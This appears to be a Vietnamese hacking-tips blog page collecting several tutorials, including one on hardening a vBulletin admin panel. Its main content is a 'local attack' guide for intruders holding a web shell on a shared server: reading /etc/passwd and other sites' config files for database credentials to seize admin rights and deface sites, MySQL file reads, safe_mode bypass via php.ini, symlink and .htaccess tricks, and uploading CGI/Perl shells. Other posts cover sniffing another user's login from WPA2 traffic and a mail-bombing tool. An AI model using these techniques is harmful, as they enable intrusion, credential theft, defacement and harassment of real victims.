Blog Hacking Security | Blog Thủ Thuật | Blog UG: Tutorial
Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Monday, August 31, 2015

Đăng ký VPS - Hosting cP11 Free

Sunday, August 30, 2015

Free Domain + Hosting 15GB





Dùng IP US để reg nhé, IP VN nó bắt veri ký bill gì ấy. Mình dùng VPS.
Muốn chịch e nó các bác phải có số US để nhận cuộc gọi, nó veri bằng call chứ không sms nhé. Reg xong có mail, vào mail veri rồi đợi mở sẵn app đợi nó call đọc cho code 4 số. Nhập vào theo hướng dẫn là oke.
Site + app lấy số US: Site và App Phone






Tut By Rome-VZ

Boom Mail Bằng Cách Unsubscribe

70% vào inbox, k thích hợp với gmail vì gmail cho vào mục Promotions hết

Lưu ý : dùng hết tháng có khi qua tháng vẫn còn nhận mail , mọi người cân nhắc khi dùng !

Download : Here

Đợi 5s và Skip - Nguồn sưu tầm có tính phí nên các bạn chịu khó nhé !

Reg Cloud Hosting SSL Free

1. Thông Số VPS:
Memory: 512MB
Disk: 1GB

2. Cài Đặt:
1. Tạo một tài khoản ở c9.io
2. Tạo "Work Space" phần mã nguồn PHP
3. Vào Work Space
4. Bật Terminal (Alt + T)
5. Nhập mã để tạo myphpadmin
phpmyadmin-ctl install
 6. Để truy cập domain ta làm như sau:
tenworkspace-tandangnhap.c9.io
VD: tên work space là: alex
Tên đăng nhập c9 là: ann
Ta được domain là: alex-ann.c9.io
7. Truy cập domain/phpmyadmin
8. User là tên đăng nhập c9 VD: ann còn pass ta cứ để trống
9. Ta chuyển sang tiếng Anh và Change Pass php
10. Upload code lên "File > Upload Local File" Nếu bạn có source web
thì cứ up zip lên hoặc file php
11. ở Terminal ta nhập unzip a.zip "a.zip là mã nguồn bạn up lên"
12. Khi Install ta lưu ý Database MySQL Host ta thay localhost bằng 127.0.0.1 (Nó mới hoạt động nhé)
13. Thế là xong, ta đã được một CloudHosting SSL free.

END TUT - by Ann

Wednesday, January 29, 2014

Free 10.000 VNĐ Cho Điện Thoại Android

Link đăng ký : http://mcent.com/ref/GSSMCT/

đăng ký xong vào link này http://mcent.com/offer/cpi_hyfb6f/

tải app cho dt android về , chạy app khoảng 1 phút , thoát ra và nhận $ :3

vừa nhận xong kaka
[​IMG]

Saturday, January 18, 2014

Cách Sử Dụng 2 Avatar Facebook


Sunday, December 22, 2013

How to make Adf.ly Bypass Tool [©]

I. Mục tiêu cần xác định ( thông tin cần lấy ) :
- Lang thang trên mạng tôi được biết website : http://de-ads.net này có thể bypass adf.ly 1 cách rất nhanh, chính vì thế chúng ta sẽ sử dụng nó như là 1 nơi xử lý yêu cầu của mình .
- Truy cập vào website, tôi xác định những gì mình cần phục vụ cho quá trình làm . ( Element Tag )
[​IMG]
- Như chúng ta thấy nơi tôi khoanh vùng chính là thứ chúng ta sẽ truyền sự kiện ( nhập & click ) thông qua Element Tag & element id .
- Thêm một thông tin chúng ta cần lấy nữa :
[​IMG]
- Huh ? Ta xác định được tên các thẻ cùng với id của từng thẻ cụ thể :
- id="url" ( id của textbox )
- value="Deadfly!" ( value của button )
- id="results" ( cái này chắc khỏi giải thêm :D )
Vậy là đã đủ những thứ cần thiết để tiến hành sang bước thứ 2 rồi ;)
II. Thực hiện với những thông tin đã xác định được :
- Mở Visual Basic.NET . Tạo & set property như sau :
> 1 Button ( Tên : cmdGet )
> 2 Textbox ( Tên : txtInput & txtResult ) : 2 cái này set Multiline Property = true
> 1 Webbrowser
> 1 Timer ( Tên : tmResult )
More :

[​IMG]
- Ở event của Form Load ta code như sau :


- Ở event của Button cmdGet ta code như sau :


- Ở event của Timer tmResult ta code thêm dòng này : 
- OK ! Vậy là xong, đến bước cuối cùng .
III. Chạy thử và fix lỗi .

[​IMG]
Ta thu được kết quả như trên :D
- Tôi gọi đây là cái "khung xương" còn ai muốn phát triển theo ý tưởng của mình thì cứ "độn thịt" vào :D .

- Tutorial by Midz

[TUT]Cách bảo vệ Admincp của diễn đàn Vbulletin


Những việc mà các bạn cần tìm hiểu và làm đó là:
1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho :))
vd: Aitimduocadmincpnaykhong

2. Đặt mật khẩu bảo vệ thư mục cho cái thư mục admincp fake (Aitimduocadmincpnaykhong) này, có nhiều cách như add code vào global.php, index.php, hay đơn giản là cứ .htaccess + .htpasswd mà táng. Mấy bài hướng dẫn dạng này nhiều vô số kể các bạn tìm rồi làm theo thôi.

3. Thực hiện 2 bước dưới đây để chống lại việc tìm ra path thật bằng những tính năng có sẵn của Vbulletin.
a. Phân quyền lại cho các nhóm từ Mod
 -> Cao nhất không cho xem Location của thành viên khác khi dùng chức năng Who's online nhiều bản việt hóa nó dịch thành "phúc trình vãng lai" gì đó trên forum. Cách phân quyền như sau: Login vào admincp trước rồi vào
Admin CP -> Usergroups -> Usergroup Manager -> Edit Usergroup -> Who's Online Permissions -> Can View Detailed Location Info for Users -> No
Save lại và làm tương tự cho các nhóm (Group) còn lại thế là xong phần phân quyền tránh dòm ngó.

b. Giới hạn Current activity (hoạt động hiện tại) trên các tài khoản có quyền truy cập vào admincp fake đó. bằng cách sửa code trong tempate đang sài. để không cho hiển thị những thông tin có thể làm lộ location của admin khi đang hành sự trên diễn đàn. Login vào admincp rồi vào

Styles & Templates -> Search in Templates -> tìm với skin muốn sửa và tìm với từ khóa : current activity
-> ra cái kết quả màu mè MEMBERINFO -> click vào nó và tìm tiếp với từ current activity sẽ thấy đoạn code như sau:

<!-- current activity -->
<if 
condition="$prepared['lastactivitydate'] OR $prepared['action']">
<
div class="alt2 smallfont block_row" id="activity_info">
<if 
condition="$prepared['lastactivitydate']">
<
div id="last_online">
<
span class="shade">$vbphrase[last_activity]:</span$prepared[lastactivitydate]<if condition="!$show['detailedtime']"> <span class="time">$prepared[lastactivitytime]</span></if>
</
div>
</if>
<if 
condition="$prepared['action']">
<
span class="shade">$vbphrase[current_activity]:</span$prepared[action$prepared[where]
</if>
</
div>
</if>
<!-- / 
current activity -->
Sửa bằng cách thêm vào dòng code này trong nó là xong:
<if condition="!in_array($prepared['userid'], array(1,2,3,4,5,6,7,8,9))">
Chú ý: cái đống array(1,2,3,4,5,6,7,8,9) 1,2,3,4,5,6,7,8,9 này là các ID của những User có quyền truy cập vào admincp mà các bạn muốn người khác không xem được cái thông tin trong profile hé.nó sẽ thành như sau: 
<!-- current activity -->
<if 
condition="!in_array($prepared['userid'], array(1,2,3,4,5,6,7,8,9))">
<if 
condition="$prepared['lastactivitydate'] OR $prepared['action']">
<
div class="alt2 smallfont block_row" id="activity_info">
<if 
condition="$prepared['lastactivitydate']"><span class="shade">$vbphrase[last_activity]:</span$prepared[lastactivitydate]<if condition="!$show['detailedtime']"> <span class="time">$prepared[lastactivitytime]</span></if>
</
div>
</if>
<if 
condition="$prepared['action']">
<
span class="shade">$vbphrase[current_activity]:</span$prepared[action$prepared[where]
</if>
</
div>
</if>
</if>
<!-- / 
current activity -->
Save lại và làm tương tự cho các Skin khác nếu có sử dụng. Tóm lại với cách này thì nó sẽ hạn chế được gần như tối đa khả năng tìm kiếm link admincp thật của các bạn trong bước thu thập thông tin của hacker KHI TẤN CÔNG TRỰC TIẾP. Nếu forum các bạn bị dính các lỗi như SQLi và bị local attach thì ... BT 

Wednesday, May 29, 2013

1 số cơ bản của local


Ok, giờ giả sử chúng ta đã có 1 con shell trên sv. Chúng ta bắt đầu vào việc nào

Trước tiên chúng ta xem sv này có những site nào.

1 số dịch vụ check Reverse IP free như: http://www.ip-adress.com/reverse_ip/

http://domainsbyip.com

….. còn nhiều nữa ….

I/ Trường hợp dễ nhất, sv chưa config bảo mật gì hết

Chúng ta hãy nhìn hình bên dưới đây:



Chúng ta thấy gì nào:

Safe_Mode: OFF Open_Basedir: NONE Safe_Exec_Dir: /usr/bin Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.13 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : NONE

Vậy tức là sv này không config gì cả.

Vậy thì chúng ta có thể chạy các lệnh cơ bản như sau:

cat – lệnh để đọc file, cấu trúc cat <đường dẫn file trong sv> (VD: cat /home/user/public_html/includes/config.php)
dir – lệnh này có tác dụng chuyển đường dẫn thực thi, có dạng dir <đường dẫn>
cd – lệnh này có tác dụng chuyển đổi thư mục, có dạng cd

Vậy thì ko có gì khó nữa rồi. Chúng ta bắt đầu chạy lệnh đầu tiên:

cat /etc/passwd -> Bấm execute

(Trong 1 số trường hợp không được, bạn hãy thử: less /etc/passwd)

………

1 danh sách lù mù bắt đầu hiện ra. Ồ, hay ghê. Bắt đầu nhìn kĩ nào

Kéo xuống

Kéo xuống

À à…. bên dưới bắt đầu xuất hiện những dòng dạng như:

user_name_cua_victim :1076:1076:System User for user_name_cua_victim:/home/user_name_cua_victim/:/sbin/nologin

Vậy là xong rồi, bây giờ bạn đã biết user name của victim là gì, suy ngay ra đường dẫn tới nhà của nó. Việc còn lại là đọc file config của victim bằng lệnh:

cat /home/user_name_cua_victim/public_html/config.php

Sau khi có được được thông tin về CSDL của victim rồi, bạn có thể chiếm quyền admin và Deface website của hắn

II/ Trường hợp SV bật Safemode=0ff | Vô hiệu hóa vô số hàm | Không thể chạy các lệnh cơ bản được !

Ây chà, sau khi bạn thấy sv như vậy, ko thể chạy kác lệnh cơ bản này nữa.

Theo mình thì đầu tiên hãy thử vận may với phương pháp: Local viaSQL

Tiến hành thế nào ???

Tuy sv ko cho view file từ site khác nhưng với quyền hạn của con shell, chúng ta vẫn có thể view file của site chứa con shell đó.

Vậy ! Chúng ta hãy tìm tới file config của site (Trong shell có chức năng change Work directory và edit file. Bạn hãy thay đổi đường dẫn phù hợp để đọc được file config) và đăng nhập vào CSDL của site qua con chức năng của con shell. Kéo xuống sẽ có giống như hình bên dưới:



Xong, sau khi chúng ta đã login thành công được vào CSDL. Đầu tiên chúng ta hãy creat 1 Table riêng cho tiện. Cấu trúc để chạy như sau:

create table daica (dc varchar(1024));

(bạn thay đổi “daica” và “dc” cũng đc)

Sau đó chúng ta chạy tiếp lệnh:

load data local infile ‘/etc/passwd’ into table daica

( Có nghĩa là: Tải dữ liệu từ: /etc/passwd vào bảng: daica ) /etc/passwd là gì thì bên trên bạn đã thấy ồi đúng ko, nó có tác dụng liệt kê danh sách user trong server.

Nếu SV cho phép chạy lệnh này. Thì data sẽ được load vào table của chúng ta. Giờ hãy chạy lệnh:

select * from daica

( Có nghĩa là: chọn ra tất cả từ table(bảng) daica )

Ồ !!! Thấy gì nào !!! Nó lại hiện ra giống như lúc chúng ta chạy lệnh cat /etc/passwd

OK ! Giờ chúng ta lại xác định được user rồi. Chúng ta sẽ load dữ liệu từ file cần đọc về table của chúng ta.

Câu lệnh tương tự: ( Theo mình nên creat table mới cho tiện)

load data local infile ‘/home/username/public_html/config.php’ into table daica

Rồi bây giờ chỉ việc view table đó sẽ thấy file thôi.

!!! KẾt thúc !!!

**************************************

Giờ đến trường hợp SV của chúng ta không cho phép thực thi những lệnh trên !!!

Làm thế nào đây. Cách đầu tiên chúng ta nghĩ tới đó là sẽ hạ Safemode xuống để sv trở về dạng 1. Cách làm như thế nào?

Bạn tạo 1 file: php.ini có nội dung như sau:

safe_mode = off

disable_function = none

Sau đó up lên folder của con shell…… và xem kết quả …… Ồ !!! Đúng là nó về dạng 1 thật nếu sv cùi thì sau khi bypass safe mode như vậy, chúng ta lại có thể thực thi những lệnh cơ bản như bình thường.

Nhưng nếu không thì sao !!!

Nếu không, bạn hãy nghĩ ngay đến 1 cách nữa rất hữu hiệu. Đó là: SymLink

Symlink là gì ? Nó viết tắt của symbolic link ! Nó sẽ giống như chúng ta tạo 1 shortcut trên window vậy, giúp chúng ta view đc file. Câu lệnh của nó như sau:

ln -s <đường dẫn tới file cần đọc> <đường dẫnfile được ghi>

Ví dụ: ln-s /home/user/public_html/config.php daica.txt

( Đơn giản đi chỉ là daica.txt -> File này trùng luôn folder với con shell )

Tới đây thì các bạn cũng hiểu rồi chứ ! lại bắt đầu nào:

ln-s /home/user/public_html/config.php daica.txt

http://sitecuavictim.com/duongdanfoldershell/daica.txt

Nếu view được thì thôi ko sao. Nếu nó lại báo lỗi: 403 thì hãy thử:

Upload 1 file .htaccess lên ngang hàng con shell có nội dung:

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

-> sau đó view lại xem

************************************************** **xong

Vậy tất cả các cách trên đều không được nữa !!! Thì sao !!!

Chà ! Tới đây chúng ta sẽ thử sử dụng 1 source shell khác, đó là shell cgi, perl ( shell có đuôi .cgi .pl )

Đầu tiên hãy upload file shell .cgi hoặc shell.pl lên ( Các bạn có thể lấy shell này từ :
http://daica.info/bnoc/hacking-secur...a-day-du.daica )

Sau đó chmod 755 cho con shell này

Và chạy nó ……………………

Nếu chạy được !!! thì quá tuyệt rồi. Các bạn có thể dùng các lệnh cơ bản giống như trường hợp 1 -> xong film


Nguồn Theo Kid1232

Tuesday, May 28, 2013

Sniff and Decrypt WPA2 packet



Mô hình thực hiện của tut:
A và B đều biết password wifi của AP ( C )
Mục đích : Trên laptop của mình A sẽ sniff và giải mã các gói tin B-> C
Các bước thực hiện :
Bước 1 :
Các bạn vào :

http://www.wireshark.org/tools/wpa-psk.html
Trong đó : 
Passphrase là password mạng wifi( đã biết)
SSID : SSID của mạng wifi ( đã biết)
Bấm vào Generate, copy lấy đoạn PSK sinh ra
Bước 2: 
Tại máy của mình A mở cửa sổ terminal gõ các lệnh sau ( dưới quyền root) 
iwlist wlan0 scanning
 Mục đích : tìm thông tin những AP gần với A, chú ý tới channel của AP C( ở đây là channel 10)
Gõ tiếp :
iwconfig wlan0 channel 10
Chuyển card mạng wifi máy A sang monitor mode, chỉ lắng nghe trên channel 10 
service NetworkManager stop
iwconfig wlan0 mode monitor
ifconfig wlan0 up
wireshak
 Trên cửa sổ wireshark hiện ra vào
Edit-> Preferences->Protocols ->IEEE 802.11
 Check vào Enable decryption 
Key #1 : wpa-psk:( dòng psk đã lấy được ở bước 1)
Bấm ok
Trên cửa sổ wireshark bấm vào
Capture-> Interfaces
chọn wlan0 và bấm start
Bước 3:
Người B bắt đầu bật wifi trên mobile và vào trang :  
http://ceh.vn/@4rum/index.php
 Sign in với user và password của mình ( tôi sử dụng user : mylove14129, pass : abcxyz..)
Bước 4:
Người A trên cửa sổ wireshark thử filter :
wlan.addr[0:1]==8c and eapol
 Lọc lấy các gói tin eapol có 2 byte đầu tiên của địa chỉ MAC = 8c ( Ở đây là địa chỉ MAC của mobile B)
Ok. đã thấy các gói tin eapol giữa AP và B
Lọc tiếp :
http.request.method==POST
 Chú ý tới dòng 
POST /@4rum/member.php
 Ở trường :
Line-base text data : username=mylove14129&password=abcxyz....
 đã thu được user và pasword B dùng để đăng nhập vào ceh
end.
Tài liệu liên quan : 
1.http://en.wikipedia.org/wiki/IEEE_802.11i-2004
2. http://www.vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/
3. http://www.vjol.info/index.php/JSTD/article/viewFile/2698/2688
4. http://www.hvaonline.net/hvaonline/posts/list/41009.hva
5. http://wiki.wireshark.org/DisplayFilters
6.http://wiki.wireshark.org/HowToDecrypt802.11

Older Posts Home